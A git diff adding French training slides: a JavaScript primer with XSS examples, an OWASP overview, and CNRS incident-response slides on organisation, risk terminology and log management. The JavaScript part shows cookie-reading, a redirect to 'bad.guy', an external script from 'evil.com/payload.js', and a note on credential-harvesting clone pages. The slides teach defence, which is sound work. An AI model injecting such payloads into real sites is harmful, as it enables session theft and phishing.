+
+
+## Javascript
+
+* var contexte
+  * var dans le sciprt accessible partout y compris dans les fonctionns
+  * var dans les fonctions scope restreint Ã  la fonction
+  * sans le var on dÃ©clare forcÃ©ment global
+    * y compris dans une variable
+
+Note:
+- on peut avoir du js dans un pdf (adobe reader a donc un interprÃ©teur js)
+- Google a mis le pied sur l'accÃ©lÃ©rateur avec la sortie de chrome
+    - ca ve de mieuix en mieux en terme de comatibilitÃ© cross browser
+
+
+## Les Ã©vÃ©nements
+
+* dÃ©clenchement de traitements
+  * interaction utilisateur
+
+* Ã©vÃ©nements de lÃ  page
+
+
+## Les Ã©vÃ©nements
+
+* onload
+  * quand tous les Ã©lÃ©ments sont chargÃ©s
+    * il est alors possible de modifier les contenus
+
+* onunload
+  * quand on quitte le navigateur
+    * abandonner car trop intrusif
+
+
+## Les Ã©vÃ©nements
+
+* onerror
+  * en cas d'Ã©chec
+    * chargement d'image ou d'iframe par exemple
+
+* onsubmit
+  * quand un formulaire est soumis
+    * changer l'url d'un formulaire Ã  la volÃ©e
+
+
+## Le DOM
+
+[<i class="fa fa-book" aria-hidden="true"></i> document](https://developer.mozilla.org/en-US/docs/Web/API/Document)
+
+* Document Object Model
+    * document.referer (SEO)
+* id unique getElementById
+    * renvoie un rÃ©sultat
+* getElementsByTagname
+    * renvoie un tableau d'elements
+    * la page en cours est le contexte
+        * history.back() c'est un autre contexte
+        * frame ...
+
+
+## Le DOM
+
+* document.cookie
+    * values = document.cookie.split(';')
+    * "userid=maze;expires=friday 29 sept"
+* souvent utilisÃ© pour exploiter les XSS
+    * changer le contenu de la page
+    * rediriger la page
+    * changer l'url d'un formulaire
+
+
+## vrac
+
+[<i class="fa fa-book" aria-hidden="true"></i> window](https://developer.mozilla.org/en-US/docs/Web/API/Window) reprÃ©sente l'environement du navigateurs
+
+```js
+window.alert('PoC')
+```
+
+```js
+console.log('plus silencieux car visible avec la console only')
+```
+
+```js
+alert(document.cookie); // affiche le contenu du cookie de session en pop up
+window.location = "http://bad.guy"; // redirige vers http://bad.guy
+```
+
+Note:
+- redirection sur une  page identique
+    - maitrisÃ©e par nous qui renvoie au serveur oriignal aprÃ¨s avoir rÃ©cup le login / mot de passe
+
+
+## inclusion
+
+dans le corps de la page
+
+```js
+<script>alert('Poc');</script>
+```
+
+dans un fichier externe
+
+```js
+<script src="http://evil.com/payload.js"></script>
+```
+
+directement dans les Ã©vÃ©nements associÃ©s Ã  un Ã©lÃ©ment du DOM
+
+```js
+<a onclick="javascipt:alert('clicked');">peacefull link</a>
+<img onload="javascript:console.log('quieter');" />
+```
+
+
+## AJAX / XMLHTTPRequest
+
+* associÃ© au web 2.0 (2006)
+* existe depuis le dÃ©but HTTP 1.0 (1989)
+  * google map Ã©lÃ©ments de la carte chargÃ©s et rafraichis au dÃ©placement
+* permet un appel asynchrone d'url
+  * sans recharger la page
+  * le rÃ©sultat reÃ§u est utilisable par js
+
+[<i class="fa fa-github"></i> un gist exemple](https://gist.github.com/nealrs/28dbfe2c74dfdde26a30)
+
+
+[<i class="fa fa-book"></i> pour le reste tout est accessible Ã  partir d'ici](http://edu.muetton.me/)
diff --git a/content/slides/1337/md/owasp.md b/content/slides/1337/md/owasp.md
new file mode 100644
index 0000000000000000000000000000000000000000..c3556b2f8f6b24d78233e5373c5a2e60795c9e80
--- /dev/null
+++ b/content/slides/1337/md/owasp.md
@@ -0,0 +1,105 @@
+## OWASP
+* depuis janvier 2001
+* fondation AmÃ©ricaine
+    * [Ã  but non lucratif](http://en.wikipedia.org/wiki/501%28c%29_organization#501.28c.29.283.29)
+* en France
+    * Association loi 1901
+    * participe au [clusif - Club de la SÃ©curitÃ© de lâ€™Information FranÃ§ais](http://www.clusif.asso.fr/)
+    * Ludovic Petit & [Sebastien Gioria ](https://twitter.com/spoint)
+      * [L'OWASP, l'univers, et le reste](https://air.mozilla.org/talks-owasp-afup-firefoxos-security-mozilla-firefoxos-what-is-owasp-by-sebastien-gioria/)
+
+<br /><br />
+
+<iframe src="https://air.mozilla.org/talks-owasp-afup-firefoxos-security-mozilla-firefoxos-what-is-owasp-by-sebastien-gioria/video/" width="640" height="380" frameborder="0" allowfullscreen></iframe>
+
+
+## OWASP - IndÃ©pendance
+
+* composÃ© d'experts indÃ©pendants
+* indÃ©pendant des fournisseurs de solution 
+* indÃ©pendant des gouvernements
+* Les projets sont opensource
+* nombreux adhÃ©rents
+  * entreprises
+  * institutions
+  * individus
+    * [liste des membres](https://docs.google.com/spreadsheets/d/1FQEj2xQb1uTxZMXshPs0suy1Bkb5iYCbHH_vrzHMVa4/edit)
+      * [join now](http://myowasp.force.com/memberappregion)
+        * <strike>adhÃ©sion gratuite</strike> donation obligatoire 50$ minimum
+
+
+## OWASP - Projets
+
+!["OWASP Flagship mature project"](images/Flagship_banner.jpg "OWASP Flagship mature project")
+!["OWASP Lab medium level project"](images/Lab_banner.jpg "OWASP Lab medium level project")
+!["OWASP Low activity project"](images/Low_activity.jpg "OWASP Low activity project")
+!["OWASP Incubator new projects"](images/Incubator_banner.jpg "OWASP Incubator new projects")
+
+
+## OWASP - Quelques projets
+
+* Automated Security Verification
+    * Vulnerability Scanners
+    * Statis Analysis Tools
+    * fuzzing (test de donnÃ©es alÃ©atoires en entrÃ©e d'un programmme)
+* Manual Security Verification
+    * Penetration Testing Tools
+    * Code Review Tools
+* Security Architecture
+    * ESAPI
+* Secure coding
+    * AppSec Libraries
+    * ESAPI Reference implementation
+    * Guards and Filters
+
+
+## OWASP - Quelques projets
+
+* AppSec Management
+    * Reporting Tools
+* AppSec Education
+    * Flawed Apps (application trouÃ©e)
+    * Learning Environments
+    * Live CD
+    * SiteGenerator (generateur de sites  avec vulnÃ©rabilitÃ©s)
+* Canaux de diffusion
+    * [wiki](https://www.owasp.org/index.php/Main_Page)
+    * [Podcast](https://www.owasp.org/index.php/OWASP_Podcast)
+    * [Conference](https://www.owasp.org/index.php/Category:OWASP_AppSec_Conference)
+    * [Lists](https://lists.owasp.org/mailman/listinfo)
+    * [Livres](https://www.owasp.org/index.php/Category:OWASP_Books)
+    * [OWASP github](https://github.com/OWASP)
+
+
+## Owasp projects architecture
+
+* [OWASP Top Ten project](https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project)
+* [OWASP Testing Guide](https://www.owasp.org/index.php/OWASP_Testing_Project) -> v4 in progress
+   * [OWASP Risk Rating Methodology](https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology)
+* [OWASP Code Review Guide](https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project)
+* [OWASP Developer Guide](https://www.owasp.org/index.php/OWASP_Guide_Project)
+* [OWASP Application Security Desk Reference](https://www.owasp.org/index.php/Category:OWASP_ASDR_Project)
+* Projects
+    * [OWASP Cheat Sheets](https://www.owasp.org/index.php/Cheat_Sheets)
+    * [OWASP Application Security Verification Standard (ASVS)](http://www.owasp.org/index.php/ASVS)
+    * [OWASP Top Ten Project](http://www.owasp.org/index.php/Top_10)
+    * [OWASP Code Review Guide](http://www.owasp.org/index.php/Category:OWASP_Code_Review_Project)
+    * [OWASP Testing Guide](http://www.owasp.org/index.php/Testing_Guide)
+    * [OWASP Legal Project](http://www.owasp.org/index.php/Category:OWASP_Legal_Project)
+
+
+## S4UC3 PLZ
+
+* [OWASP Where we are.. Where are we going](https://docs.google.com/presentation/d/1ZgY25F0F7QgScMlB1X7LAa70LtyJql8XqcYdR4suPUo/edit#slide=id.g1fd9ad1e_0_10)
+* [[MSTD10] - Une mÃ©thode d'Ã©valuation de la sÃ©curitÃ© Web - 1/1](http://www.microsoft.com/france/vision/mstechdays10/Webcast.aspx?EID=413f809d-abbc-467d-a930-5e2d7da27fef)
+* [Web Application Firewalls (WAF)](http://www.cert-ist.com/documents/Document_Cert-IST_000333.pdf)
+* Autres
+    * [PCI SSC â€ Payment Card Industry Security Standards Council](https://www.pcisecuritystandards.org)
+        * [PCI - DSS Data Payment Card Industry Security Standard](https://www.pcisecuritystandards.org/security_standards/documents.php)
+        * [french version](http://fr.pcisecuritystandards.org/minisite/en/) 
+    * [Web Application Security Consortium Project page](http://projects.webappsec.org)
+    * [Imperva - Resources](http://www.imperva.com/resources/overview.html)
+    * [MITRE â€ Common Weakness Enumeration â€“ Vulnerability](Trends, http://cwe.mitre.org/documents/vulnâ€trends.html)
+    * [CLUSIF](http://www.clusif.asso.fr/)
+        * [CLUSIF - ouvrages](http://www.clusif.asso.fr/fr/production/ouvrages/)
+        * [CLUSIR - RhÃ´nes-Alpes](http://www.clusir-rha.fr/)
diff --git a/content/slides/1337/md/reagir/00_contexte.md b/content/slides/1337/md/reagir/00_contexte.md
new file mode 100644
index 0000000000000000000000000000000000000000..e4ef330efa80118c0d309e6f660788aa4dd0a3e7
--- /dev/null
+++ b/content/slides/1337/md/reagir/00_contexte.md
@@ -0,0 +1,198 @@
+## Contexte
+
+<div style="text-align: center">
+
+![alt text](/_/gdi/images/contexte.jpg "Contexte") <!-- .element: width="80%" -->
+
+</div>
+
+
+## Contexte
+* Les Ã©tats ont/vont renforcer la rÃ¨glementation pour combattre les failles et les attaques [LPM/SAIV/OIV](http://www.defense.gouv.fr/actualites/dossiers/la-loi-de-programmation-militaire-lpm-2014-2019), [PPSIE](http://www.ssi.gouv.fr/fr/menu/actualites/le-premier-ministre-dote-l-etat-de-sa-premiere-politique-globale-de-securite.html), [Les diffÃ©rents plans gouvernementaux](http://www.ssi.gouv.fr/fr/defense-des-si/les-plans-gouvernementaux/), ...
+* Lâ€™incident nâ€™est plus lâ€™exception mais la rÃ¨gle, il faut 
+  * industrialiser son traitement
+  * limiter lâ€™impact direct sur lâ€™information, les processus mÃ©tiers, lâ€™organisme, les personnes
+  * limiter lâ€™impact indirect sur les Ã©quipes en charge du traitement
+  * se protÃ©ger, câ€™est aussi savoir rÃ©agir !
+
+Note:
+- Loi contre le terrorisme 2014
+- Loi pour le renseignement 2015
+- contexte tendu depuis les attentats
+- piratage rÃ©cent Sony / TV5 monde ... ThalÃ¨s
+
+
+## Obligation lÃ©gale <!-- .element: id="legal" -->
+* [RÃ¨glement europÃ©en du 24/06/2013](http://eur-lex.europa.eu/LexUriServ/LexUriServ.do?uri=OJ:L:2013:173:0002:0008:FR:PDF")
+* [PSSIE (Article 7) - 17 jullet 2014](http://www.ssi.gouv.fr/IMG/pdf/pssie_anssi.pdf)
+  * *"Chaque entitÃ© contribue Ã  la protection et Ã  la dÃ©fense des systÃ¨mes d'information de L'Etat par la mise en place d'une "chaÃ®ne opÃ©rationnelle", qui rend compte rÃ©guliÃ¨rement Ã  la chaÃ®ne fonctionnelle SSI"*
+* [Objectifs de sÃ©curitÃ© [ANSSI]- 27 fÃ©rvier 2014](http://www.ssi.gouv.fr/IMG/pdf/20140310_Objectifs_de_cybersecurite_document_public.pdf)
+  * 5/ GÃ©rer les incidents de cybersÃ©curitÃ©
+* [Informatique et libertÃ© (article 34 bis)](http://www.legifrance.gouv.fr/affichTexte.do?cidTexte=JORFTEXT000000886460#LEGIARTI000024504700)
+  * Violation des [donnÃ©es Ã  caractÃ¨re personnel](http://www.cil.cnrs.fr/CIL/spip.php?rubrique299a)
+    * dÃ©claration Ã  la CNIL et Ã  lâ€™intÃ©ressÃ©
+* [ArrÃªtÃ© du 3 juillet 2012 ](http://www.legifrance.gouv.fr/affichTexte.do?cidTexte=JORFTEXT000026140136&dateTexte=) relatif Ã  la PPST
+    * Article 1 : signalement des incidents majeurs
+* [Charte informatique du CNRS (3.2 RÃ¨gles dâ€™utilisation)](http://www.cil.cnrs.fr/CIL/IMG/pdf/charte_info.pdf)
+
+Note:
+- Niveau Francais, DÃ©fense, IL pour l'utilisateur, employeur, EuropÃ©en
+- d'oÃ¹ cette formation
+
+
+## Objectifs
+* Maintenir les compÃ©tences
+* Mettre en place une "bonne pratique" supplÃ©mentaire
+* Renforcer lâ€™expertise interne existante
+* PrÃ©parer une formation "investigation"
+* PrÃ©parer le dÃ©veloppement dâ€™un rÃ©seau national collaboratif dâ€™experts
+* Anticiper le passage Ã  un systÃ¨me de dÃ©tection â€“ rÃ©action plus efficace
+
+
+##Â de la [sÃ©curitÃ© nationale](http://fr.wikipedia.org/wiki/S%C3%A9curit%C3%A9_nationale) Ã  la SSI au CNRS           
+### [La dÃ©fense en profondeur](http://circulaire.legifrance.gouv.fr/pdf/2009/04/cir_2014.pdf)
+
+* SÃ©bastien Le Prestre de Vauban
+            
+<div style="text-align: center;">
+    <img src="/_/images/fortification-a-la-vauban.jpg" width="50%" />
+</div>
+            
+* exploiter plusieurs techniques de sÃ©curitÃ© afin de rÃ©duire le risque lorsqu'un composant particulier de sÃ©curitÃ© est compromis ou dÃ©faillant
+
+Note:
+- circulaire Ã  lire
+- un mot sur la dÃ©fense nationale / dÃ©fense globale / sÃ©curitÃ© nationale
+
+
+## StratÃ©gie de la dÃ©fense en profondeur
+* n'Ã©vite pas l'attaque
+  * ralentit l'attaquant en lui opposant des difficultÃ©s multiples et variÃ©es
+    * **chacun** est un maillon de la sÃ©curitÃ© nationale
+      * **chacun** est donc responsable
+        * de l'analyse des risques inhÃ©rents Ã  son pÃ©rimÃ¨tre pour mieux les maÃ®triser
+        * de l'anticipation et de la prÃ©vention des accidents et des actes de malveillance
+        * **de l'amÃ©lioration continuelle de la sÃ©curisation de son pÃ©rimÃ¨tre**
+          * le risque 0 n'existe pas
+          * la sÃ©curitÃ© peut toujours Ãªtre amÃ©liorÃ©e
+
+
+## la chaÃ®ne SÃ©curitÃ© DÃ©fense
+
+<div style="text-align: center;">
+    <img src="/_/ssi/images/ssi/organisation_nationale_sdn.png" width="50%" />
+</div>
+
+Note:
+- FSD CNRS Philippe Gasnot
+- Le haut "socle commun avec les partenaires"
+- le bas "niveau Ã©tablissements"
+
+
+## la chaÃ®ne SSI
+
+<div style="text-align: center;">
+    <img src="/_/ssi/images/ssi/organisation_nationale.png" width="50%" />
+</div>
+
+Note:
+- AQSSI Alain Fuchs
+
+
+## la chaÃ®ne sÃ©curitÃ© au CNRS
+
+<div style="text-align: center;">
+    <img src="/_/gdi/images/organisation_securite_cnrs.png" />
+</div>
+
+Note:
+- RSSI DR7 Gaetan Dardy
+- RSSI CNRS M. Parache a dÃ©missionnÃ© et va Ãªtre bientÃ´t remplacÃ©â€¦
+
+
+## La SSI niveau national CNRS
+* Un RSSIC nommÃ© par le prÃ©sident et placÃ©, sous lâ€™autoritÃ© du DGDR, Ã  la DSI dispose dâ€™une Ã©quipe    
+  * Un RSSIC adjoint
+  * Un RSSI DSI
+  * Dont les missions principales sont  
+    * Lâ€™animation du rÃ©seau SSI du CNRS
+    * La dÃ©finition et le suivi du plan dâ€™action national SSI qui est prÃ©sentÃ© devant le ComitÃ© de Pilotage de la SSI du CNRS
+    * La prise en compte des directives SGDSN â€“ MinistÃ¨re en lien avec les partenaires du domaine ESR
+  * Qui est Ã©galement chargÃ© de mission auprÃ¨s du Fonctionnaire de SÃ©curitÃ© et de DÃ©fense (FSD) du CNRS
+    * pour garantir la conformitÃ© des actions SSI avec la protection du potentiel scientifique et  technique
+
+Note:
+- RSSIC adjoint Francois Morris
+- RSSI DSI JÃ©rÃ©mie Boutard
+
+
+## La SSI niveau rÃ©gional CNRS
+* Un RSSI de DR
+  * nommÃ©, dans chaque dÃ©lÃ©gation rÃ©gionale aprÃ¨s avis du RSSIC
+  * anime le rÃ©seaux des chargÃ©s de sÃ©curitÃ© des systÃ¨mes dâ€™information (CSSI) des unitÃ©s suivies par sa dÃ©lÃ©gation
+* La CRSSI
+  * Le RSSI DR sâ€™entoure, en accord avec le RSSIC, dâ€™experts SSI appartenant Ã  des unitÃ©s de recherche, pour former une coordination rÃ©gionale de la SSI (CRSSI)
+
+
+## La SSI niveau unitÃ© CNRS
+* Le DU est responsable de la SSI
+* [Le ChargÃ© de sÃ©curitÃ© des systÃ¨mes dâ€™information (CSSI)](https://aresu.dsi.cnrs.fr/spip.php?article120) 
+  * nommÃ© par le directeur dâ€™unitÃ©, aprÃ¨s avis du RSSI rÃ©gional
+  * assiste son DU dans lâ€™exercice de sa responsabilitÃ© en matiÃ¨re de SSI
+  * assiste son DU pour la mise en Å“uvre de la PSSI du CNRS dans son unitÃ©
+  * sensibilise les agents Ã  la SSI
+  * met en Å“uvre les recommandations SSI transmises par le RSSI du CNRS
+  * gÃ¨re les alertes et incidents
+
+Note:
+- responsabilitÃ© du DU exemple du chiffrement
+
+
+##Â Point de contact
+* Toute unitÃ© doit en avoir un
+  * Un Ã©vÃ©nement liÃ© Ã  la sÃ©curitÃ© de l'information doit Ãªtre rapportÃ©, enregistrÃ©, traitÃ© au niveau local
+    * Si signalÃ© Ã  un niveau supÃ©rieur, sera systÃ©matiquement rÃ©percutÃ© au niveau local
+    * Au cas oÃ¹ le niveau local serait impliquÃ©, possibilitÃ© de signalement au niveau supÃ©rieur
+  * PubliÃ©, connu de tous
+    * Noms des personnes
+    * MÃ¨l
+    * TÃ©lÃ©phone
+  * Assistance utilisateurs si elle existe
+  * Souvent CSSI, ASR
+  * Peut Ãªtre mutualisÃ© entre plusieurs unitÃ©s
+  * Pas nÃ©cessairement un spÃ©cialiste de la sÃ©curitÃ©
+
+
+## ISIRT (Information Security Incident Response Team)
+<div style="text-align: center;">
+    <img src="/_/gdi/images/isirt_cnrs.png" />
+</div>
+
+
+## RemontÃ©e et veille en sÃ©curitÃ© CNRS
+
+<div style="text-align: center;">
+    <img src="/_/gdi/images/remontee_veille_cnrs.png" />
+</div>
+
+
+## [Espace de travail collaboratif dÃ©diÃ© Ã  la SSI](https://extra.core-cloud.net/collaborations/RSSI-CNRS)
+
+* PartagÃ©
+  * RSSI + Adjoints (partenaires compris)
+  * CRSSI
+  * CSSI + Adjoints
+  * 1 liste dâ€™ASR pour la diffusion des alertes hebdomadaires
+* PrÃ©vention
+  * Documentation sur la sensibilisation des utilisateurs
+  * EnquÃªte (vivante) sur le dÃ©ploiement du chiffrement
+* Politique de sÃ©curitÃ©
+  * PGSSI du CNRS dont la charte SSI du 29/11/2013
+  * PSSI opÃ©rationnelle pour les laboratoires
+  * Liste des rÃ¨gles classÃ©e par chapitre (sensibilitÃ© notÃ©e 1 Ã  3 *)
+* Un systÃ¨me de dÃ©claration des incidents utilisant un workflow
+
+Note:
+- le live CD d'A2IMP
+- des fiches techniques liÃ©s aux Ã©vÃ©nements d'actualitÃ©s
+- ces supports et ceux des autres DR
\ No newline at end of file
diff --git a/content/slides/1337/md/reagir/01_formalisation.md b/content/slides/1337/md/reagir/01_formalisation.md
new file mode 100644
index 0000000000000000000000000000000000000000..9d6ec6d3c1ef85b1b4d2318c415238dbc80ddacf
--- /dev/null
+++ b/content/slides/1337/md/reagir/01_formalisation.md
@@ -0,0 +1,131 @@
+## Formalisation
+
+<div style="text-align: center;">
+    <img src="/_/gdi/images/GdI-incidents.png" width="70%"/>
+</div>
+
+
+## qu'est ce qu'un incident de sÃ©curitÃ©?
+
+* violation d'un des critÃ¨res de sÃ©curitÃ© de l'information
+ * confidentialitÃ©
+ * intÃ©gritÃ© 
+ * disponibilitÃ©
+
+
+## [Gestion de risques](https://www.cases.lu/fr/gestion-du-risque.html)
+### ici avec la terminologie [EBIOS](http://www.ssi.gouv.fr/IMG/pdf/EBIOS-1-GuideMethodologique-2010-01-25.pdf)
+* utilise plusieurs Ã©lÃ©ments de la mÃ©thodologie
+  * notion de scenarii
+  * notion de vraissemblance / probabilitÃ© / occurrence
+  * les Ã©chelles
+  * les bases de connaissances
+* doit Ãªtre caractÃ©risÃ© par un type
+  * vol ou perte
+  * intrusion
+  * ingÃ©nierie sociale (arnaque, phishing, etc.)
+  * violation des rÃ¨gles (P2P illÃ©gal)
+  * DÃ©ni de services
+  * VulnÃ©rabilitÃ© dÃ©couverte mais a priori non exploitÃ©e
+
+
+## Sources de Menaces 
+### CaractÃ©ristaion
+* origine humaine 
+  * intentionnelle
+    * motivations
+  * accidentelle
+* origine non humaine
+  * naturelle
+  * animale
+  * contingence
+* facilitÃ© d'accÃ¨s au sujet de l'Ã©tude (interne ou externe)
+* capacitÃ©s (force intrinsÃ¨que, selon leurs ressources, expertise, dangerositÃ©â€¦)
+  * notion pertinente en analyse de risques
+  * inutile dans le cas de la gesiton d'incident (l'attaque a eu effectivement eu lieu)
+
+
+## Sources de Menaces <!-- .element: id="menace" -->
+### Classification
+* Source humaine interne, malveillante
+* Source humaine externe, malveillante
+* Source humaine interne, sans intention de nuire
+* Source humaine externe, sans intention de nuire
+* Code malveillant d'origine inconnue
+* PhÃ©nomÃ¨ne naturel
+* Catastrophe naturelle ou sanitaire
+* ActivitÃ© animale
+* Ã‰vÃ©nement interne
+
+
+## Motivations
+* Jeu, dÃ©fi
+* CuriositÃ©
+* Argent, cupiditÃ©, gain financier
+* Destruction, vandalisme, sabotage
+* Vengeance
+* RÃ©bellion
+* IdÃ©ologie, avantage politique
+* Chantage
+* Ego, amour-propre, couverture mÃ©diatique
+* Recherche d'un avantage concurrentiel, espionnage Ã©conomique, renseignement
+* Terrorisme
+* Erreurs et omissions involontaires
+
+
+## Actifs
+* Actifs primordiaux
+  * Processus et activitÃ©s mÃ©tier
+  * Informations
+* Actifs support
+  * MatÃ©riel
+  * Logiciels
+  * RÃ©seau
+  * Personnel
+  * Site
+  * Structure de l'organisation
+* Menace
+  * Cible les actifs primordiaux
+  *Exploite les vulnÃ©rabilitÃ©s des actifs en support
+
+
+## VulnÃ©rabilitÃ©s<!-- .element: id="vulnerabilite" -->
+* A identifier au mieux 
+  * DÃ©terminer les versions des produits
+    * trouver des vulnÃ©rabilitÃ©s connues
+      * Si possible dÃ©terminer le <a href="http://cve.mitre.org/index.html">CVE (Common Vulnerabilities and Exposures)</a>
+
+
+## Exploits
+* Mode opÃ©ratoire de lâ€™attaquant
+  * RÃ©cupÃ©rer le maximum dâ€™informations sur
+    * Actions effectuÃ©es        
+    * Outils, programmes, scripts utilisÃ©s
+
+
+## Impacts, consÃ©quences
+* Types dimpacts et consÃ©quences retenus pour le CNRS
+  * Pertes financiÃ¨res
+  * DÃ©sorganisation interne
+  * Atteinte Ã  lâ€™image de marque
+  * Pertes du potentiel scientifique et technique
+  * Condamnation et contentieux
+  * SÃ©curitÃ© des personnes et  atteintes Ã  l'environnement
+* Evaluation
+  * ImmÃ©diat : perte d'un critÃ¨re de sÃ©curitÃ© (DIC)
+    * Pertes directes (vol ou perte)
+    * Temps passÃ© Ã  la rÃ©solution de l'incident
+    * Temps perdu suite Ã  une indisponilibitÃ© ou Ã  la restauration de l'intÃ©gritÃ©
+  * Plus ou moins long terme
+
+
+## GravitÃ©
+* Evaluation une fois l'analyse de l'incident terminÃ©
+* MÃªmes Ã©chelles que pour lâ€™apprÃ©ciation des risques
+* Estimation des consÃ©quences potentielles en fonction des Ã©lÃ©ments disponibles
+  * PrÃ©voir le pire
+  * Doit Ãªtre en permanence reconsidÃ©rÃ©e
+* Les quasi incidents
+  * Les dommages ont Ã©tÃ© Ã©vitÃ©s par chance
+  * DÃ©couverte de vulnÃ©rabilitÃ©s
+  * Doit Ãªtre Ã©valuÃ© comme un risque
\ No newline at end of file
diff --git a/content/slides/1337/md/reagir/02_etapes_principales.md b/content/slides/1337/md/reagir/02_etapes_principales.md
new file mode 100644
index 0000000000000000000000000000000000000000..058e297dc419550dcbedc6eb13ba83265b88228a
--- /dev/null
+++ b/content/slides/1337/md/reagir/02_etapes_principales.md
@@ -0,0 +1,48 @@
+## &Eacute;tapes principales
+
+<div style="text-align: center">
+    <img src="/_/gdi/images/plan.jpg" width="70%" />
+</div>
+
+
+## Etapes de la gestion dâ€™incidents
+* La norme dÃ©finit 5 Ã©tapes : [ISO27035 4.5](http://www.iso27001security.com/html/27035.html) (Information security incident management)
+  * Prepare
+  * Identify
+  * Assess
+  * Respond
+  * Learn
+* Cette formation traite la gestion d'incidents en 6 Ã©tapes
+  * PrÃ©parer
+  * DÃ©tecter, Ã©valuer et rÃ©agir
+  * Confiner et acquÃ©rir (rapidement)
+  * Eradiquer et agir (efficacement)
+  * Recouvrer (et prÃ©venir)
+  * Consolider
+
+
+## Diagramme de flux
+
+<div style="text-align: center;">
+    <a href="/_/gdi/images/diagdeflux.png"><img src="/_/gdi/images/diagdeflux.png" width="40%" /></a>
+</div>
+
+Note:
+- aspect amÃ©lioration
+
+
+##Â Cartographie de la Gestion d'incidents au CNRS
+
+[![alt text](/_/gdi/images/MindMap.png "Cartographie de la Gestion d'incidents au CNRS")](https://aresu.dsi.cnrs.fr/IMG/pdf/Incidents.pdf)
+
+
+## Roue de Deming (PDCA)
+
+<div style="text-align: center;">
+    <img src="/_/gdi/images/PDCA.jpg" width="70%" />
+</div>
+
+* Planifier
+* DÃ©velopper
+* ContrÃ´ler
+* Ajuster
\ No newline at end of file
diff --git a/content/slides/1337/md/reagir/03_preparer.md b/content/slides/1337/md/reagir/03_preparer.md
new file mode 100644
index 0000000000000000000000000000000000000000..7544b311a63f127441567ee777b535945a7cef46
--- /dev/null
+++ b/content/slides/1337/md/reagir/03_preparer.md
@@ -0,0 +1,133 @@
+## PrÃ©parer <img src="/_/images/PDCA/PDCA-P.png" width="20%" align="right"/>
+
+<div style="text-align: center;">
+    <img src="/_/gdi/images/etes-vous-prets.jpg" width="70%"/>
+</div>
+
+
+## PrÃ©parer <img src="/_/images/PDCA/PDCA-P.png" width="20%" align="right"/>
+* Ãªtre identifiÃ© comme CSSI
+* organiser la sensibilisation
+* anticiper l'arrivÃ©e de l'incident pour
+  * dÃ©dramatiser
+  * avoir une marche Ã  suivre
+    * Ã©viter les erreurs techniques et organisationelles   
+  * Ã©viter la culpabilitÃ©
+  * Ã©viter la dissimulation
+    * la dÃ©claration d'incident est une obligation lÃ©gale
+    * rappeler les Chartes d'utilisation des moyens informatiques du CNRS et des partenaires
+
+Note:
+- vertu de l'identificaiton, facilite la remontÃ©e Ã©vite la dissimulation amÃ¨ne Ã  un comportement intelligent vis Ã  vis de l'incidetn
+- sensibilisation bon point de dÃ©part
+
+
+## PrÃ©parer <img src="/_/images/PDCA/PDCA-P.png" width="20%" align="right"/>
+* Lâ€™environnement organisationnel
+  * PrÃ©parer ou se rapprocher des procÃ©dures de gestions de crise
+  * PrÃ©parer ou se rapprocher des plans de communication 
+    * PrÃ©parer la gestion des prioritÃ©s avec la hiÃ©rarchie, pour  exemple :
+      * P1 : les personnes
+      * P2 : les informations Â« PPST Â» 
+      * P3 : les informations personnelles
+      * etc.
+  * S'assurer que la hiÃ©rarchie est impliquÃ©e et consciente de sa responsabilitÃ©
+
+
+## PrÃ©parer <img src="/_/images/PDCA/PDCA-P.png" width="20%" align="right"/>
+* Lâ€™environnement organisationnel
+  * PrÃ©parer une fiche de contacts (hiÃ©rarchie, partenaires, tutelles, etc.) 
+  * Identifier les chaines de sÃ©curitÃ© (ISIRT ou CSIRT en local, rÃ©gional, national, partenaires, etc.)    
+  * PrÃ©parer des fiches rÃ©flexes
+  * Connaitre les diffÃ©rents plan de continuitÃ© (PCA) et plan de reprise (PRA) du pÃ©rimÃ¨tre
+    * par exemple, les bascules automatiques peuvent dÃ©truire les preuves
+  * Disposer dâ€™une liste dâ€™outils pour lâ€™acquisition (A2IMP)
+
+
+## PrÃ©parer <img src="/_/images/PDCA/PDCA-P.png" width="20%" align="right"/>
+* Lâ€™environnement lÃ©gal
+* Etre Ã  jour sur les dÃ©clarations CNIL
+* Etre Ã  jour sur la rÃ©glementation spÃ©cifique
+* Avoir mis en place les mentions lÃ©gales
+   * Web: [http://www.cil.cnrs.fr/CIL/spip.php?page=mentions_legales](http://www.cil.cnrs.fr/CIL/spip.php?page=mentions_legales)
+    * SystÃ¨mes: <img src="/_/gdi/images/notice_to_users.png" width="60%" />
+
+Note: 
+- Affaire bluetouf & kitetoa "il n'ya pas de dÃ©lis sans intention de le connaÃ®tre"
+
+
+## PrÃ©parer <img src="/_/images/PDCA/PDCA-P.png" width="20%" align="right"/>
+* Gestion des traces
+  * [Politique de gestion des traces d'utilisation des moyens informatiques et des services rÃ©seau au CNRS](https://aresu.dsi.cnrs.fr/IMG/pdf/Po_gest_traces.pdf)
+    * Le CNRS a fait une dÃ©claration Ã  la CNIL relative aux logs
+      * Conserver
+        * Logs serveurs et postes de travail
+        * Logs serveurs de messagerie
+        * Logs serveurs Web
+        * Logs Services rÃ©seaux + Ã©quipements d'extrÃ©mitÃ©s (Firewalls, routeurs, â€¦)
+        * Logs de systÃ¨mes de dÃ©tection d'intrusion (IDS)
+        * Logs de applications spÃ©cifiques, dÃ¨s lors qu'elles enregistrent des donnÃ©es de connexion, d'utilisation
+  * La durÃ©e de conservation de ces journaux est fixÃ©e au maximum Ã  1 an (et au minimum Ã  1 an aussi ...)
+
+
+## PrÃ©parer <img src="/_/images/PDCA/PDCA-P.png" width="20%" align="right"/>
+* Gestion des traces
+  * Elle nous prÃ©cise aussi la maniÃ¨re dont : 
+    * on peut exploiter ces donnÃ©es (analyse, statistiques, â€¦)
+    * l'unitÃ© doit informer les utilisateurs de la gestion qui est faite des traces qui les concernent.
+  * En fonction de ces informations, il apparaÃ®t quâ€™il est Ã  minima fortement recommandÃ© de :
+    * GÃ©rer ses logs sur tous ses serveurs
+    * dÃ©ployer une architecture de centralisation des logs
+  * Solution prÃ©conisÃ©e par le CNRS:
+    * rsyslog + outil d'analyse (logCheck, logwatch, logAnalyser, logStash, ElasticSearch, Kibana)
+
+
+## PrÃ©parer <img src="/_/images/PDCA/PDCA-P.png" width="20%" align="right"/>
+* La gestion des traces
+  * Les utilisateurs doivent Ãªtre informÃ©s (CNIL)
+    * Charte
+  * Le traitement doit Ãªtre proportionnel (CNIL)
+    * Gestion pour supervision technique sans intrusion dans la vie privÃ©e
